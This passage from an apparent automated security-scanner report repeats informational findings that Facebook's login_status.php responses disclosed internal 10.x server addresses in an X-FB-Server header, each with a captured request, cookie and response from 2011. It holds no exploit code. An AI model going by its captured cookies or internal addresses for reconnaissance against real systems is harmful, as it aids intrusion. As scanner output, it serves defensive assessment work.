GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3b8e3c5f8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff15c9a2904%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3325c481c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff15c9a2904%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfa02dfdc4%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df336b31d74%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff15c9a2904%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfa02dfdc4&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfc889e314%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff15c9a2904%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfa02dfdc4&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df8fde74ec%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff15c9a2904%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfa02dfdc4&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.217.101
X-Cnection: close
Date: Thu, 16 Jun 2011 12:30:39 GMT
Content-Length: 22

Invalid Application ID

19.671. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.102.45

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df239539214%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff36caf868c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df18d9b1a8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff36caf868c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df18ab3622c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2d0bb625%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff36caf868c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df18ab3622c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3fa1d61d%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff36caf868c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df18ab3622c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2ec0bb15c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff36caf868c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df18ab3622c&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.102.45
X-Cnection: close
Date: Thu, 16 Jun 2011 18:27:22 GMT
Content-Length: 22

Invalid Application ID

19.672. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.227.38

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfdca48928%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3d796fb18%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1d5cd4a3c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3d796fb18%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df67150964%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3b20c1fa8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3d796fb18%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df67150964&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df30113e0a8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3d796fb18%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df67150964&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2853ac078%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3d796fb18%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df67150964&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.227.38
X-Cnection: close
Date: Thu, 16 Jun 2011 12:40:58 GMT
Content-Length: 22

Invalid Application ID

19.673. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.36.33

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df28729c3ec%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff11698f0b4%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df171e1d338%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff11698f0b4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1aafdb2a4%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df17e846f4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff11698f0b4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1aafdb2a4&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1501607%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff11698f0b4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1aafdb2a4&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df174c8b974%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff11698f0b4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1aafdb2a4&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.36.33
X-Cnection: close
Date: Thu, 16 Jun 2011 15:57:21 GMT
Content-Length: 22

Invalid Application ID

19.674. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.75.39

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df14b484504%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff367d4868%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df215498af4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff367d4868%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1bfa4cd14%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1c6126614%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff367d4868%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1bfa4cd14&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df391472c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff367d4868%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1bfa4cd14&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3a95b65f8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff367d4868%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1bfa4cd14&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.75.39
X-Cnection: close
Date: Thu, 16 Jun 2011 16:59:20 GMT
Content-Length: 22

Invalid Application ID

19.675. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.49.58

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df7158c224%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2824c430%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df212213c68%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2824c430%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df32f3ef5d%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df189efe67c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2824c430%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df32f3ef5d&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1daf8c44%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2824c430%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df32f3ef5d&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1c9c41828%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2824c430%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df32f3ef5d&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.49.58
X-Cnection: close
Date: Thu, 16 Jun 2011 13:32:40 GMT
Content-Length: 22

Invalid Application ID

19.676. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.186.29

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df37092348%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff118208ba%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df24cb5f074%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff118208ba%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dffad71618%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2bef82e04%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff118208ba%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dffad71618&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df613567d%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff118208ba%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dffad71618&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2aae312a4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff118208ba%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dffad71618&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.186.29
X-Cnection: close
Date: Thu, 16 Jun 2011 14:34:39 GMT
Content-Length: 22

Invalid Application ID

19.677. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.236.36

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df254a06ed4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff19ecc276%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df20933861%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff19ecc276%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df236a796b4%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df19340112c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff19ecc276%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df236a796b4&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2a4e6b5d4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff19ecc276%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df236a796b4&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2c4fcb61c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff19ecc276%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df236a796b4&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.236.36
X-Cnection: close
Date: Thu, 16 Jun 2011 16:17:59 GMT
Content-Length: 22

Invalid Application ID

19.678. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.183.60

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3495ef19c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff326be5c14%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df34b11abac%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff326be5c14%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1a97f5aac%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df20af3b798%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff326be5c14%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1a97f5aac&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df26c74a80%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff326be5c14%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1a97f5aac&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfe290b154%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff326be5c14%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1a97f5aac&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.183.60
X-Cnection: close
Date: Thu, 16 Jun 2011 19:19:18 GMT
Content-Length: 22

Invalid Application ID

19.679. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.190.43

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1a53c3c6%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2e1211308%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df17ce7e1bc%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2e1211308%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1c9cbd598%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1e2d96344%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2e1211308%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1c9cbd598&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df8cd78a74%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2e1211308%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1c9cbd598&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df21356050%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2e1211308%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1c9cbd598&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.190.43
X-Cnection: close
Date: Thu, 16 Jun 2011 14:29:29 GMT
Content-Length: 22

Invalid Application ID

19.680. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.19.37

Request

